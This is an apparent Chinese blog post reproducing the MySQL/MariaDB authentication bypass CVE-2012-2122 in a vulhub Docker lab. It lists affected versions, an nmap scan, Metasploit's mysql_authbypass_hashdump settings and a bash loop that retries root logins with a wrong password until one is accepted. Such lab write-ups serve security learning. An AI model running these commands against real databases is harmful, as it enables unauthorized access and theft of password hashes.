- 1【Transformer时序预测】基于贝叶斯网络BO-Transformer实现锂电池寿命预测附matlab代码
- 2【相机与图像】2. 相机内外参的标定的代码示例_相机外参标定 csdn
- 3AI时代的新沟通能力:结构化提示词
- 4error: ‘vector‘ does not name a type_error: ‘psgmvector2d’ does not name a type; did yo
- 5python 合并函数_python中合并数组的方法
- 6Zookeeper集群搭建详细步骤_怎么在一台虚拟机上搭建zk集群
- 7PXE自动平台 搭建 银河麒麟 UEFI x86_64 ARM64_pxe安装麒麟系统
- 8Git问题:git拉取/推送github代码出现Connection closed by问题_github connection
- 9【ollama】Linux下更改ollama模型下载路径_linux ollama指定模型路径
- 10Hive判空函数 COALESCE 和 NVL 使用示例_hive coalesce
mysql身份认证绕过漏洞复现(CVE-2012-2122)_mysql cve-2012-2122
赞
踩
漏洞描述
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。
漏洞危害
漏洞泄露了数据库等关键敏感信息,如果被篡改数据库信息其危害较大
受版本影响
-
MySQL 5.1.x before 5.1.63
-
5.5.x before 5.5.24,
-
5.6.x before 5.6.6,
-
MariaDB 5.1.x before 5.1.62,
-
5.2.x before 5.2.12
-
5.3.x before 5.3.6
-
5.5.x before 5.5.23
主机准备
一台ubuntu(192.168.8.158),一台kail
均处于同一内网环境下。
其中kail作为攻击主机,ubuntu作为受害主机。
环境搭建
-
进入vulhub-master目录环境:
-
执行如下命令:
<code class="language-plaintext hljs">docker-compose up -d</code>
dokcer ps 查看进程是否启动
访问3306端口查看环境
此时环境搭建成功
nmap -T4 -sV -O -p 3306 192.168.8.158
进行端口扫描发现靶机开启3306端口,并且mysql版本5.5.23
漏洞复现
第一种:
使用Meterpreter
msfconsole
search CVE-2012-2122
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
show options
set RHOSTS 192.168.8.158
set THREADS 20
run
这里可能是msf有些许问题导致没有爆出root密码
如果有同学和我有相似问题可以参考以下方法
第二种:
使用shell脚本
先使用正确的密码登录看看是否成功启动环境
在kail主机的命令行输入命令
mysql -h 192.168.8.208 -u root -p123456 -P3306(如果提示连接次数过多请重启环境)
编写如下shell脚本,并执行
payload.sh
<code class="language-plaintext hljs">for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.8.208 -P3306 ; done</code>注:将ip改为自己的
命令行执行
切换到脚本存放路径
<code class="language-plaintext hljs">bash payload.sh</code>
此时复现成功
